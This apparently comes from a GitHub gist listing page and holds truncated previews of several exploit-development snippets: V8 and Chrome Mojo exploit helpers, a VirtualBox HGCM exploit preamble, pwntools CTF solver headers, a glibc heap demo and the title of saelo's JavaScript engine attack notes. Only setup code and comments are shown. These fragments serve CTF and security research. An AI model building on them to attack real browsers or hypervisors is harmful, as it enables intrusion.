This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sleep( sleepDuration ){ | |
var now = new Date().getTime(); | |
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
} | |
function gc() { | |
for (let i = 0; i < 0x10; i++) { | |
new ArrayBuffer(0x1000000); | |
} | |
} | |
let data_view = new DataView(new ArrayBuffer(8)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Helpers { | |
constructor() { | |
this.cvt_buf = new ArrayBuffer(8); | |
this.cvt_f64a = new Float64Array(this.cvt_buf); | |
this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
} | |
ftoi(f) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|=-----------------------------------------------------------------------=| | |
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
|=-----------------------------------------------------------------------=| | |
|=------------------------------=[ saelo ]=------------------------------=| | |
|=-----------------------------------------------------------------------=| | |
The following are some brief notes about the changes that have taken place | |
since the release of the "Attacking JavaScript Engines" paper [1]. In | |
general, no big conceptional changes have happened since. Mitigations have | |
been added to break some of the presented techniques and, as expected, a |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author : peternguyen93 | |
import sys | |
sys.path.append('../') # back to vboxlib module | |
from vboxlib.hgcm import * | |
from vboxlib.chromium import * | |
from ctypes import * | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<pre id='log'></pre> | |
<script src="mojo_bindings.js"></script> | |
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> | |
<script src="being_creator_interface.mojom.js"></script> | |
<script src="food_interface.mojom.js"></script> | |
<script src="dog_interface.mojom.js"></script> | |
<script src="person_interface.mojom.js"></script> | |
<script src="cat_interface.mojom.js"></script> | |
<script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
# context(terminal=['tmux', 'new-window']) # open new window | |
# libc = ELF('') | |
elf = ELF('./speedrun-012') | |
context(os='linux', arch=elf.arch) | |
context(log_level='debug') # output verbose log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdint.h> | |
#include <sys/io.h> | |
#include <unistd.h> | |
#include <stdio.h> | |
#include <fcntl.h> | |
#include <sys/mman.h> | |
#include <string.h> | |
#include <assert.h> | |
#include "virt_to_phys.c" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
// | |
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
// | |
// Copyright (c) 2018 Samuel Groß | |
// | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#define chunksize 0x8 | |
#define fakesize 0x20 | |
#define SIZE_SZ (sizeof(size_t)) | |
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1) | |
#define MIN_CHUNK_SIZE 24 /* 64 bit system */ | |
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
NewerOlder